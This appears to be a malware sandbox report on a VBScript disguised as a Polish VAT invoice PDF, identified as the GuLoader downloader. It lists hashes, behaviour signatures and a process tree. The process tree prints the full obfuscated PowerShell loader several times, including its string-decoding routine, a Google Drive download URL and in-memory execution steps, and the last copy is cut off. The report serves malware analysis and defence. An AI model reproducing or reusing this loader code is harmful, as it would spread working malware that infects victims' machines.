Overview

overview

10

Static

static

1

Faktura_VA...df.vbs

windows7-x64

10

Faktura_VA...df.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    133s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    16-09-2024 10:32

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Faktura_VAT__U2409161195150793564·pdf.vbs

  • Size

    39KB

  • MD5

    a8eaec0ce9a1a02805ca7248d61dce62

  • SHA1

    3adc63cda4f1d797b49b0ae721cbb41caecda524

  • SHA256

    c54caab4e2957ad82b579e23bb079984b7aaf13484f8c5989a6b4aa84048bc2c

  • SHA512

    aac88d2ba244c376eee4ce0ea38050b95e45f682d7f667b11d016e77822484864f5c6b7fa8b0ea6bc98463c2e3dcfd0bdc3bd2bc16204368109512d28ecd472a

  • SSDEEP

    384:Z9vOg3gWe95Arw8M+OJWlZjYUKsA8r7Opt/in6M6zyQQZWnspmErww6u3TTluQeW:Zp3gWU8MaSpBm6eMs34W30atvp

Score
10/10
guloaderdiscoverydownloaderexecution

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Network Service Discovery 1 TTPs 3 IoCs

    Attempt to gather information on host's network.

    discovery
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Faktura_VAT__U2409161195150793564·pdf.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2096
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Securement Insole Lemurid Toiling Amtsskatteinspektorater #>;$Juk='Gotthard';<#Topophone Spong Wommerala Tutorhood Shinings #>;$Squushy=$host.PrivateData;If ($Squushy) {$Flgestningen++;}function Unmordant($Hama){$Apokryferne=$Hama.Length-$Flgestningen;for( $Krlningernes=5;$Krlningernes -lt $Apokryferne;$Krlningernes+=6){$Coappear+=$Hama[$Krlningernes];}$Coappear;}function Gunnybag($Gerda){ . ($Byggeentreprenrer) ($Gerda);}$Pseudologically=Unmordant 'anticMShooloS ftizReassi S,dll FolklreexpaSp ri/Sjle,5 genn.Joc s0sa,tl Ordgy(volumWSkru ig ffenSlukudBlottoProgrw uodesfrema Dus,nNSvineTKaner Konkr1 oved0Ornit. Solv0 None;Parbr ModulWDobbeiFormunAlter6Erhve4 m ti; Sp i elkox Rigs6afsta4Suld ;Peste Anemor S bsv Asth:Filos1tarh 2Risme1Oxyge.Civil0Landl)p.aus .ksgrGPhotoeChurlc ladkPartioAktio/Wi wa2 angw0Pyrit1 Brin0 Ddsd0 afeg1Pencr0brygg1.ejem S.matFEboniiUnparrAnkomeD drifJurisoUd.laxSlaun/Navig1Scen,2Afh l1 Ande.Thala0Uninf ';$Dovenskaben23=Unmordant '.nteruMo.taSn game PrsiRSolit-R ineANippeg aln ERdal nMarmotErgos ';$Underdunged=Unmordant 'RekonhArtiltGitoxtLaborpTalomsPreco:Stemm/Prede/Para,d S idrForgriSubvevAnaeseDitet.Tap ngColleosnakkoSaerlgUnsoulUdvejeKokke.Sp.chc VrdioAq acm Meru/ElectuSkb,ecPetal? aggeeH ndbxBef ypGimpdoFlygtrPristtBranc=GrammdSv,jbo kkulwUndernLoganlKl raoNonana nderdpynte&finkuiUdgr.d Raab=dekup1Kln lA terlI.eparvIsome1telepKDelig-AntrokAlterk Un oxrot,eKhypopS Pupi6Forsk2VolatjUfls tWealtRAntipPF lipXDeco v Bu kBS.peruApneueSte cHSaltfqBvregJTincta rgi6SkiagK Tids6AmbitBProsegAnklabCysto ';$Deactivation=Unmordant ' yrs>Melan ';$Byggeentreprenrer=Unmordant 'BlrehiSlvsnEsofthX A,ro ';$Plovfuren='Hejsnings';$Telegrambureauers = Unmordant 'Renovejus,icO erahMournoErhve Unco%Po yoaTra ipSaktipC mbad,aggoaPhonetTaelsaAyme %Incor\KlassIDat,bnTempedIndtjld bugaHusbua MininDwaibe KylotTiebr. AntiSUn ufo tamir anim St aa& Plan& Brav BesveMul.vcUindshLak koSoaps De ritsynsr ';Gunnybag (Unmordant 'Scram$gravmgAg oslUnexpoKlinib Fl taSelvflWi,ne:BestiUSulfonPokomfSyg peNaifsiHerligKraalnStab e G.nndReroulSauroy nulp2Kerne4Refu 4wiwic= ordr( etcacVrkstmEnergdGalea su.pb/D armcDjvle agrot$S oroTCyklue.dsprlJenfreBilligforsor In raintermOp.qubBenziuUsa drDepo eTheoraForvauKn.wpeU forrDetersQuent) Defe ');Gunnybag (Unmordant 'lovme$ForplgInkublHenfroIndvibFriheaGtepalAfdel:SprogK tracuDikten GerlsTempetUpblonPac feb.aasrEpithiBinnysSalrekp.troe Ski,=Tilst$ anjaU JulenEfterdDvrgpevedlir rsspdPo ceu StudnPrevig ChemeUnge,dSlave.Tyfuss etrapKommulCusswi OevrtReolr( rbrn$BrndeDreviseTacklaApp mcDepretRrligi Turtv RekaaafbaatLoggai Uncho ryptnUd al) Ineb ');Gunnybag (Unmordant ' U de[OutroN SchaeAnerktStrai.Chro,SFl mmeDisser Str vPa,niiOffsicTore e stanPBrunkoShr kiPiv.tnelin.tTransMDrawkaramn.n kva aVandfgT nifeBolivrSqui ] Idio:Jager:ProreS Vam eAnme cSpha.u ,verr Im uiLen.tt.elleyso,ecP FablrIndfloF ndet .ontoUdspecKyllioO edilSau e Wacko= Dete Broma[ Tkn,N MaaleSkruetSmrb .KvaliS TudseStenkcTr ctu taverForstisossltMatriyUhaanPExceerm yapo Billt,bessoEsthecSerpeoFagjalLind Tun elySkibsptankeeSeism] ,aba:Klemm: ohavT dtralHallisCa he1Fjar 2fadde ');$Underdunged=$Kunstneriske[0];$Veterinrsygeplejerske= (Unmordant 'Kvrul$CaricG Bud LEmbarOK elhbBytteAOverfl axte:Staphako geL SafaLBrandiUnan.tLing t Ba eEOrnitR enneE Aa br hir= Au,inPersoECarpoW Sour-Traymocan.ibStodgjHomo.EForsyC emiotVel o Telefs Ans.yDeforsSleuttBurgleF gurMAddit.IberiNAfsnieDemoltGynos.Kont w IsabEsyltebHemaucPreh,lKnessiImpurED sgaNOptimt');$Veterinrsygeplejerske+=$Unfeignedly244[1];Gunnybag ($Veterinrsygeplejerske);Gunnybag (Unmordant 'Admir$ rchpA StenlNoledl Snebi napstStr.nt sgemeAbbozrMisspeDegrarDandi.PargeHIntoneThr caGteskd autoeT gltrlderps ont[Under$Ser iDMdelooSpytsvDorrseVersanAngussLandekaidfuaPaagrbUndereInitinDiact2nonnu3Charm]Far a=Mo.he$ PhylP Circs BriseUncaru pahidBal yoMethylRetsaoUovergAbsciiwurtzc Semia CoadlS rkllSkribyUltra ');$Beylics=Unmordant 'Gripp$SkabeA Tripl BusklOutw.iB hovtO gelt b rieRestyr SkrieNonb r,ooki.EpipsDtrombo Wafewregisn SoublQuartoLlbinaAl yod HummFAnechiDireklVi,eneKhane( way$BomulU skolnBiss,dDi igeLandfrLys rd ebyruF,erkn AborgC,teregenv d rdru,svrds$V kstTuanverBandsi utancReplahSstjeoLeflesSivebpVaciloProgrrArse a rintnIn isg For iH odoa F ctlHelio) Vurd ';$Trichosporangial=$Unfeignedly244[0];Gunnybag (Unmordant 'Whirt$.espoG ortblN.ncooBobinbBrandATurdalPopu :agaretPiazirCarobiFu iclpegasIStallT onarhHenvioZarebnYacht= S ff(Rip oTagt lePre eSBn,haTPytho-UnselP rgenAMajketantabhOdori Undel$SmallTejec RModskIDyfleCKvittHKardiO.radeSSt rmP,knheOE ulaRReve,ASpaann.agwogLegetiUdtryaspecilB obd)Ethno ');while (!$Trilithon) {Gunnybag (Unmordant 'Redni$YardfgFusiolPse doO erdbHjstaaIldlslB,eph:PostfCAbattlShealaReglawSk roeNonmadSonor= Avnb$I restOmdelr Jt euSt,eneMenis ') ;Gunnybag $Beylics;Gunnybag (Unmordant 'Tra hSFilabtSu etabrandr TilbtTor e-Kond.SNeg sludemie,aywoeR jeop Con. Homog4Mlket ');Gunnybag (Unmordant 'S.bro$ Diacg.arrilA ydooLetsibGendia.elstlscaff: unfeT ehavrGaleaiR acclC ingiSknditTuttehPh rmoBrashnAm.ia= Copy(Br nzT.phereTor msO ciat.rost-Ver.iPFisk aD mintReporhQuodl Indbe$M semTdu perAnglei Cli cDrog hAra,io UnassFatalpKarakoZeroarMasdea ritnV lgagFgtniiAttleaFremsl thew)Overs ') ;Gunnybag (Unmordant 'Za ar$Limm gOrganl utomoGastrbOphtha Aud lBr nd:OversEMik.omHiberiMod ag,yvaarTracka S.ignCranetRodnesHemps=Grupp$Ewtefg S atlAfearoAnsvabssteraHex plmntin:SrklaBTele.oBaarigPa risSilket LeasaUnplovmeinekOmsadoC,rbod SalaeTawnin.dmaasLumme+ Skyt+a tac% Lbet$HasteKRa eluNettonLegalsI tratRamshnRewade Dis rAsimeiProfesLychnkAktiee aad.Stor cVekslo redsuKabelnStikltAf if ') ;$Underdunged=$Kunstneriske[$Emigrants];}$Gsteforelse=305321;$Decahedron=28935;Gunnybag (Unmordant ' Nonn$StrejgHairll UgenoGrafibA,veraAnastlFresi:SvigeP SkderNikkeeS.perd oveiSinkncsquelaStarttFrostiGod.rntrykngBefa,9Witto7Misco Koiar=Nonfi HardeG .engeincubt Deco-SuburCPedalo revn coxptUdsmyeP obenForwetsnaps Speci$ MaleTTriplrBes riSovemc Dagph SmokoH,sitsGarg,pHeresoC efsrFluctaUdfalnSe ifgUnconiUnperaof.inlBartr ');Gunnybag (Unmordant 'Ser i$ InnagMrklalNu,syoDua.ibIcekha,rintlErsta:UnspeFBlikve AfvicTjrmokR.shifAnstiu PoodlHyphelpre.cyabern Inds= Fum. Skatt[ ChigSCognay ynsisSundht Ge heR,ssom.orfr.StampCPsycho Ef.en Nonev OpereUmorarKr.stt .nco]Kompa:Opsvu:BilbyFVaaberEntero izelmVindpBcha caCutbasGu tleUtero6Angos4ScorbStelegt tranrVrng iForeinUnd rgAktiv(Kybel$K,lniPVindtrHespeeFif idIndfaiArthrc Arbea,ornetTo,oniSimi.nRuf.egRef.i9Prism7Mohab)Biote ');Gunnybag (Unmordant 'Cho e$ParadgNonagl rigsoPeriobEkspoauroval gren: in kA AbjulBac skShippo arih reevoConvulHera lRettes Je skNonmyaCicerd Punte ustrtForn. Te,n=Aa ds u,pen[UsikkSKoketyTobaksPreb tPersyeVandfmGadab. loomTLsegle .losxAkastt Plan.Uni aERelatnNewshc Rem oKn,brdSammei TanknRumblg Turi]Vol.u:Vandl:LnstiAM.tasSBeskaCSaldoI ParlIInfla.OcreaGStrateHarmot HomoSDoktot Re rrSheriiMa.egnCloghgherma( Agra$arthrF liveeHabutc okskGrapef TrevuVituplMercilC gwaySekti)Hjmod ');Gunnybag (Unmordant 'budge$EberhgK.alil FienoGildabJunciaW ongl nder:.lectSChefko PdoffB ligacarrop DnieuNegridIsraee Hj pnsmede=Ordin$TypifAPolarl M ndkTremaoConvohU,gdooGodshlCoseyl UnstsOvertk R gsaTrifadStafeeOpsent onde. AbscsChoosu Campb Pap sSl eptsetter Jer iU.rign.ellig N,nl(Tilhy$Hes.eGBr nesMod tt abbieJudd flu,teo Dgnar Showe Rhodl TigesSkiv eTr ns,Windo$SundhDSensieSprogcStabiataniehTred.eMislidSilderP,onaoOffennpow e)Klere ');Gunnybag $Sofapuden;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Network Service Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2372
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Indlaanet.Sor && echo t"
        3⤵
          PID:2736
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Securement Insole Lemurid Toiling Amtsskatteinspektorater #>;$Juk='Gotthard';<#Topophone Spong Wommerala Tutorhood Shinings #>;$Squushy=$host.PrivateData;If ($Squushy) {$Flgestningen++;}function Unmordant($Hama){$Apokryferne=$Hama.Length-$Flgestningen;for( $Krlningernes=5;$Krlningernes -lt $Apokryferne;$Krlningernes+=6){$Coappear+=$Hama[$Krlningernes];}$Coappear;}function Gunnybag($Gerda){ . ($Byggeentreprenrer) ($Gerda);}$Pseudologically=Unmordant 'anticMShooloS ftizReassi S,dll FolklreexpaSp ri/Sjle,5 genn.Joc s0sa,tl Ordgy(volumWSkru ig ffenSlukudBlottoProgrw uodesfrema Dus,nNSvineTKaner Konkr1 oved0Ornit. Solv0 None;Parbr ModulWDobbeiFormunAlter6Erhve4 m ti; Sp i elkox Rigs6afsta4Suld ;Peste Anemor S bsv Asth:Filos1tarh 2Risme1Oxyge.Civil0Landl)p.aus .ksgrGPhotoeChurlc ladkPartioAktio/Wi wa2 angw0Pyrit1 Brin0 Ddsd0 afeg1Pencr0brygg1.ejem S.matFEboniiUnparrAnkomeD drifJurisoUd.laxSlaun/Navig1Scen,2Afh l1 Ande.Thala0Uninf ';$Dovenskaben23=Unmordant '.nteruMo.taSn game PrsiRSolit-R ineANippeg aln ERdal nMarmotErgos ';$Underdunged=Unmordant 'RekonhArtiltGitoxtLaborpTalomsPreco:Stemm/Prede/Para,d S idrForgriSubvevAnaeseDitet.Tap ngColleosnakkoSaerlgUnsoulUdvejeKokke.Sp.chc VrdioAq acm Meru/ElectuSkb,ecPetal? aggeeH ndbxBef ypGimpdoFlygtrPristtBranc=GrammdSv,jbo kkulwUndernLoganlKl raoNonana nderdpynte&finkuiUdgr.d Raab=dekup1Kln lA terlI.eparvIsome1telepKDelig-AntrokAlterk Un oxrot,eKhypopS Pupi6Forsk2VolatjUfls tWealtRAntipPF lipXDeco v Bu kBS.peruApneueSte cHSaltfqBvregJTincta rgi6SkiagK Tids6AmbitBProsegAnklabCysto ';$Deactivation=Unmordant ' yrs>Melan ';$Byggeentreprenrer=Unmordant 'BlrehiSlvsnEsofthX A,ro ';$Plovfuren='Hejsnings';$Telegrambureauers = Unmordant 'Renovejus,icO erahMournoErhve Unco%Po yoaTra ipSaktipC mbad,aggoaPhonetTaelsaAyme %Incor\KlassIDat,bnTempedIndtjld bugaHusbua MininDwaibe KylotTiebr. AntiSUn ufo tamir anim St aa& Plan& Brav BesveMul.vcUindshLak koSoaps De ritsynsr ';Gunnybag (Unmordant 'Scram$gravmgAg oslUnexpoKlinib Fl taSelvflWi,ne:BestiUSulfonPokomfSyg peNaifsiHerligKraalnStab e G.nndReroulSauroy nulp2Kerne4Refu 4wiwic= ordr( etcacVrkstmEnergdGalea su.pb/D armcDjvle agrot$S oroTCyklue.dsprlJenfreBilligforsor In raintermOp.qubBenziuUsa drDepo eTheoraForvauKn.wpeU forrDetersQuent) Defe ');Gunnybag (Unmordant 'lovme$ForplgInkublHenfroIndvibFriheaGtepalAfdel:SprogK tracuDikten GerlsTempetUpblonPac feb.aasrEpithiBinnysSalrekp.troe Ski,=Tilst$ anjaU JulenEfterdDvrgpevedlir rsspdPo ceu StudnPrevig ChemeUnge,dSlave.Tyfuss etrapKommulCusswi OevrtReolr( rbrn$BrndeDreviseTacklaApp mcDepretRrligi Turtv RekaaafbaatLoggai Uncho ryptnUd al) Ineb ');Gunnybag (Unmordant ' U de[OutroN SchaeAnerktStrai.Chro,SFl mmeDisser Str vPa,niiOffsicTore e stanPBrunkoShr kiPiv.tnelin.tTransMDrawkaramn.n kva aVandfgT nifeBolivrSqui ] Idio:Jager:ProreS Vam eAnme cSpha.u ,verr Im uiLen.tt.elleyso,ecP FablrIndfloF ndet .ontoUdspecKyllioO edilSau e Wacko= Dete Broma[ Tkn,N MaaleSkruetSmrb .KvaliS TudseStenkcTr ctu taverForstisossltMatriyUhaanPExceerm yapo Billt,bessoEsthecSerpeoFagjalLind Tun elySkibsptankeeSeism] ,aba:Klemm: ohavT dtralHallisCa he1Fjar 2fadde ');$Underdunged=$Kunstneriske[0];$Veterinrsygeplejerske= (Unmordant 'Kvrul$CaricG Bud LEmbarOK elhbBytteAOverfl axte:Staphako geL SafaLBrandiUnan.tLing t Ba eEOrnitR enneE Aa br hir= Au,inPersoECarpoW Sour-Traymocan.ibStodgjHomo.EForsyC emiotVel o Telefs Ans.yDeforsSleuttBurgleF gurMAddit.IberiNAfsnieDemoltGynos.Kont w IsabEsyltebHemaucPreh,lKnessiImpurED sgaNOptimt');$Veterinrsygeplejerske+=$Unfeignedly244[1];Gunnybag ($Veterinrsygeplejerske);Gunnybag (Unmordant 'Admir$ rchpA StenlNoledl Snebi napstStr.nt sgemeAbbozrMisspeDegrarDandi.PargeHIntoneThr caGteskd autoeT gltrlderps ont[Under$Ser iDMdelooSpytsvDorrseVersanAngussLandekaidfuaPaagrbUndereInitinDiact2nonnu3Charm]Far a=Mo.he$ PhylP Circs BriseUncaru pahidBal yoMethylRetsaoUovergAbsciiwurtzc Semia CoadlS rkllSkribyUltra ');$Beylics=Unmordant 'Gripp$SkabeA Tripl BusklOutw.iB hovtO gelt b rieRestyr SkrieNonb r,ooki.EpipsDtrombo Wafewregisn SoublQuartoLlbinaAl yod HummFAnechiDireklVi,eneKhane( way$BomulU skolnBiss,dDi igeLandfrLys rd ebyruF,erkn AborgC,teregenv d rdru,svrds$V kstTuanverBandsi utancReplahSstjeoLeflesSivebpVaciloProgrrArse a rintnIn isg For iH odoa F ctlHelio) Vurd ';$Trichosporangial=$Unfeignedly244[0];Gunnybag (Unmordant 'Whirt$.espoG ortblN.ncooBobinbBrandATurdalPopu :agaretPiazirCarobiFu iclpegasIStallT onarhHenvioZarebnYacht= S ff(Rip oTagt lePre eSBn,haTPytho-UnselP rgenAMajketantabhOdori Undel$SmallTejec RModskIDyfleCKvittHKardiO.radeSSt rmP,knheOE ulaRReve,ASpaann.agwogLegetiUdtryaspecilB obd)Ethno ');while (!$Trilithon) {Gunnybag (Unmordant 'Redni$YardfgFusiolPse doO erdbHjstaaIldlslB,eph:PostfCAbattlShealaReglawSk roeNonmadSonor= Avnb$I restOmdelr Jt euSt,eneMenis ') ;Gunnybag $Beylics;Gunnybag (Unmordant 'Tra hSFilabtSu etabrandr TilbtTor e-Kond.SNeg sludemie,aywoeR jeop Con. Homog4Mlket ');Gunnybag (Unmordant 'S.bro$ Diacg.arrilA ydooLetsibGendia.elstlscaff: unfeT ehavrGaleaiR acclC ingiSknditTuttehPh rmoBrashnAm.ia= Copy(Br nzT.phereTor msO ciat.rost-Ver.iPFisk aD mintReporhQuodl Indbe$M semTdu perAnglei Cli cDrog hAra,io UnassFatalpKarakoZeroarMasdea ritnV lgagFgtniiAttleaFremsl thew)Overs ') ;Gunnybag (Unmordant 'Za ar$Limm gOrganl utomoGastrbOphtha Aud lBr nd:OversEMik.omHiberiMod ag,yvaarTracka S.ignCranetRodnesHemps=Grupp$Ewtefg S atlAfearoAnsvabssteraHex plmntin:SrklaBTele.oBaarigPa risSilket LeasaUnplovmeinekOmsadoC,rbod SalaeTawnin.dmaasLumme+ Skyt+a tac% Lbet$HasteKRa eluNettonLegalsI tratRamshnRewade Dis rAsimeiProfesLychnkAktiee aad.Stor cVekslo redsuKabelnStikltAf if ') ;$Underdunged=$Kunstneriske[$Emigrants];}$Gsteforelse=305321;$Decahedron=28935;Gunnybag (Unmordant ' Nonn$StrejgHairll UgenoGrafibA,veraAnastlFresi:SvigeP SkderNikkeeS.perd oveiSinkncsquelaStarttFrostiGod.rntrykngBefa,9Witto7Misco Koiar=Nonfi HardeG .engeincubt Deco-SuburCPedalo revn coxptUdsmyeP obenForwetsnaps Speci$ MaleTTriplrBes riSovemc Dagph SmokoH,sitsGarg,pHeresoC efsrFluctaUdfalnSe ifgUnconiUnperaof.inlBartr ');Gunnybag (Unmordant 'Ser i$ InnagMrklalNu,syoDua.ibIcekha,rintlErsta:UnspeFBlikve AfvicTjrmokR.shifAnstiu PoodlHyphelpre.cyabern Inds= Fum. Skatt[ ChigSCognay ynsisSundht Ge heR,ssom.orfr.StampCPsycho Ef.en Nonev OpereUmorarKr.stt .nco]Kompa:Opsvu:BilbyFVaaberEntero izelmVindpBcha caCutbasGu tleUtero6Angos4ScorbStelegt tranrVrng iForeinUnd rgAktiv(Kybel$K,lniPVindtrHespeeFif idIndfaiArthrc Arbea,ornetTo,oniSimi.nRuf.egRef.i9Prism7Mohab)Biote ');Gunnybag (Unmordant 'Cho e$ParadgNonagl rigsoPeriobEkspoauroval gren: in kA AbjulBac skShippo arih reevoConvulHera lRettes Je skNonmyaCicerd Punte ustrtForn. Te,n=Aa ds u,pen[UsikkSKoketyTobaksPreb tPersyeVandfmGadab. loomTLsegle .losxAkastt Plan.Uni aERelatnNewshc Rem oKn,brdSammei TanknRumblg Turi]Vol.u:Vandl:LnstiAM.tasSBeskaCSaldoI ParlIInfla.OcreaGStrateHarmot HomoSDoktot Re rrSheriiMa.egnCloghgherma( Agra$arthrF liveeHabutc okskGrapef TrevuVituplMercilC gwaySekti)Hjmod ');Gunnybag (Unmordant 'budge$EberhgK.alil FienoGildabJunciaW ongl nder:.lectSChefko PdoffB ligacarrop DnieuNegridIsraee Hj pnsmede=Ordin$TypifAPolarl M ndkTremaoConvohU,gdooGodshlCoseyl UnstsOvertk R gsaTrifadStafeeOpsent onde. AbscsChoosu Campb Pap sSl eptsetter Jer iU.rign.ellig N,nl(Tilhy$Hes.eGBr nesMod tt abbieJudd flu,teo Dgnar Showe Rhodl TigesSkiv eTr ns,Windo$SundhDSensieSprogcStabiataniehTred.eMislidSilderP,onaoOffennpow e)Klere ');Gunnybag $Sofapuden;"
          3⤵
          • Network Service Discovery
          • Suspicious use of WriteProcessMemory
          PID:2628
          • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Securement Insole Lemurid Toiling Amtsskatteinspektorater #>;$Juk='Gotthard';<#Topophone Spong Wommerala Tutorhood Shinings #>;$Squushy=$host.PrivateData;If ($Squushy) {$Flgestningen++;}function Unmordant($Hama){$Apokryferne=$Hama.Length-$Flgestningen;for( $Krlningernes=5;$Krlningernes -lt $Apokryferne;$Krlningernes+=6){$Coappear+=$Hama[$Krlningernes];}$Coappear;}function Gunnybag($Gerda){ . ($Byggeentreprenrer) ($Gerda);}$Pseudologically=Unmordant 'anticMShooloS ftizReassi S,dll FolklreexpaSp ri/Sjle,5 genn.Joc s0sa,tl Ordgy(volumWSkru ig ffenSlukudBlottoProgrw uodesfrema Dus,nNSvineTKaner Konkr1 oved0Ornit. Solv0 None;Parbr ModulWDobbeiFormunAlter6Erhve4 m ti; Sp i elkox Rigs6afsta4Suld ;Peste Anemor S bsv Asth:Filos1tarh 2Risme1Oxyge.Civil0Landl)p.aus .ksgrGPhotoeChurlc ladkPartioAktio/Wi wa2 angw0Pyrit1 Brin0 Ddsd0 afeg1Pencr0brygg1.ejem S.matFEboniiUnparrAnkomeD drifJurisoUd.laxSlaun/Navig1Scen,2Afh l1 Ande.Thala0Uninf ';$Dovenskaben23=Unmordant '.nteruMo.taSn game PrsiRSolit-R ineANippeg aln ERdal nMarmotErgos ';$Underdunged=Unmordant 'RekonhArtiltGitoxtLaborpTalomsPreco:Stemm/Prede/Para,d S idrForgriSubvevAnaeseDitet.Tap ngColleosnakkoSaerlgUnsoulUdvejeKokke.Sp.chc VrdioAq acm Meru/ElectuSkb,ecPetal? aggeeH ndbxBef ypGimpdoFlygtrPristtBranc=GrammdSv,jbo kkulwUndernLoganlKl raoNonana nderdpynte&finkuiUdgr.d Raab=dekup1Kln lA terlI.eparvIsome1telepKDelig-AntrokAlterk Un oxrot,eKhypopS Pupi6Forsk2VolatjUfls tWealtRAntipPF lipXDeco v Bu kBS.peruApneueSte cHSaltfqBvregJTincta rgi6SkiagK Tids6AmbitBProsegAnklabCysto ';$Deactivation=Unmordant ' yrs>Melan ';$Byggeentreprenrer=Unmordant 'BlrehiSlvsnEsofthX A,ro ';$Plovfuren='Hejsnings';$Telegrambureauers = Unmordant 'Renovejus,icO erahMournoErhve Unco%Po yoaTra ipSaktipC mbad,aggoaPhonetTaelsaAyme %Incor\KlassIDat,bnTempedIndtjld bugaHusbua MininDwaibe KylotTiebr. AntiSUn ufo tamir anim St aa& Plan& Brav BesveMul.vcUindshLak koSoaps De ritsynsr ';Gunnybag (Unmordant 'Scram$gravmgAg oslUnexpoKlinib Fl taSelvflWi,ne:BestiUSulfonPokomfSyg peNaifsiHerligKraalnStab e G.nndReroulSauroy nulp2Kerne4Refu 4wiwic= ordr( etcacVrkstmEnergdGalea su.pb/D armcDjvle agrot$S oroTCyklue.dsprlJenfreBilligforsor In raintermOp.qubBenziuUsa drDepo eTheoraForvauKn.wpeU forrDetersQuent) Defe ');Gunnybag (Unmordant 'lovme$ForplgInkublHenfroIndvibFriheaGtepalAfdel:SprogK tracuDikten GerlsTempetUpblonPac feb.aasrEpithiBinnysSalrekp.troe Ski,=Tilst$ anjaU JulenEfterdDvrgpevedlir rsspdPo ceu StudnPrevig ChemeUnge,dSlave.Tyfuss etrapKommulCusswi OevrtReolr( rbrn$BrndeDreviseTacklaApp mcDepretRrligi Turtv RekaaafbaatLoggai Uncho ryptnUd al) Ineb ');Gunnybag (Unmordant ' U de[OutroN SchaeAnerktStrai.Chro,SFl mmeDisser Str vPa,niiOffsicTore e stanPBrunkoShr kiPiv.tnelin.tTransMDrawkaramn.n kva aVandfgT nifeBolivrSqui ] Idio:Jager:ProreS Vam eAnme cSpha.u ,verr Im uiLen.tt.elleyso,ecP FablrIndfloF ndet .ontoUdspecKyllioO edilSau e Wacko= Dete Broma[ Tkn,N MaaleSkruetSmrb .KvaliS TudseStenkcTr ctu taverForstisossltMatriyUhaanPExceerm yapo Billt,bessoEsthecSerpeoFagjalLind Tun elySkibsptankeeSeism] ,aba:Klemm: ohavT dtralHallisCa he1Fjar 2fadde ');$Underdunged=$Kunstneriske[0];$Veterinrsygeplejerske= (Unmordant 'Kvrul$CaricG Bud LEmbarOK elhbBytteAOverfl axte:Staphako geL SafaLBrandiUnan.tLing t Ba eEOrnitR enneE Aa br hir= Au,inPersoECarpoW Sour-Traymocan.ibStodgjHomo.EForsyC emiotVel o Telefs Ans.yDeforsSleuttBurgleF gurMAddit.IberiNAfsnieDemoltGynos.Kont w IsabEsyltebHemaucPreh,lKnessiImpurED sgaNOptimt');$Veterinrsygeplejerske+=$Unfeignedly244[1];Gunnybag ($Veterinrsygeplejerske);Gunnybag (Unmordant 'Admir$ rchpA StenlNoledl Snebi napstStr.nt sgemeAbbozrMisspeDegrarDandi.PargeHIntoneThr caGteskd autoeT gltrlderps ont[Under$Ser iDMdelooSpytsvDorrseVersanAngussLandekaidfuaPaagrbUndereInitinDiact2nonnu3Charm]Far a=Mo.he$ PhylP Circs BriseUncaru pahidBal yoMethylRetsaoUovergAbsciiwurtzc Semia CoadlS rkllSkribyUltra ');$Beylics=Unmordant 'Gripp$SkabeA Tripl BusklOutw.iB hovtO gelt b rieRestyr SkrieNonb r,ooki.EpipsDtrombo Wafewregisn SoublQuartoLlbinaAl yod HummFAnechiDireklVi,eneKhane( way$BomulU skolnBiss,dDi igeLandfrLys rd ebyruF,erkn AborgC,teregenv d rdru,svrds$V kstTuanverBandsi utancReplahSstjeoLeflesSivebpVaciloProgrrArse a rintnIn isg For iH odoa F ctlHelio) Vurd ';$Trichosporangial=$Unfeignedly244[0];Gunnybag (Unmordant 'Whirt$.espoG ortblN.ncooBobinbBrandATurdalPopu :agaretPiazirCarobiFu iclpegasIStallT onarhHenvioZarebnYacht= S ff(Rip oTagt lePre eSBn,haTPytho-UnselP rgenAMajketantabhOdori Undel$SmallTejec RModskIDyfleCKvittHKardiO.radeSSt rmP,knheOE ulaRReve,ASpaann.agwogLegetiUdtryaspecilB obd)Ethno ');while (!$Trilithon) {Gunnybag (Unmordant 'Redni$YardfgFusiolPse doO erdbHjstaaIldlslB,eph:PostfCAbattlShealaReglawSk roeNonmadSonor= Avnb$I restOmdelr Jt euSt,eneMenis ') ;Gunnybag $Beylics;Gunnybag (Unmordant 'Tra hSFilabtSu etabrandr TilbtTor e-Kond.SNeg sludemie,aywoeR jeop Con. Homog4Mlket ');Gunnybag (Unmordant 'S.bro$ Diacg.arrilA ydooLetsibGendia.elstlscaff: unfeT ehavrGaleaiR acclC ingiSknditTuttehPh rmoBrashnAm.ia= Copy(Br nzT.phereTor msO ciat.rost-Ver.iPFisk aD mintReporhQuodl Indbe$M semTdu perAnglei Cli cDrog hAra,io UnassFatalpKarakoZeroarMasdea ritnV 